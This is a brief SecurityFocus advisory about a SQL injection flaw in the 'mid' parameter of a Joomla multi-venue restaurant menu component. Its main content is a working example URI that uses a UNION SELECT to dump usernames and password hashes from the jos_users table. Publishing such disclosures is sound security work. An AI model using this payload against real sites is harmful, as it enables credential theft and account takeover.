Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

Then following example URI is available:

http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>


 

Privacy Statement
Copyright 2010, SecurityFocus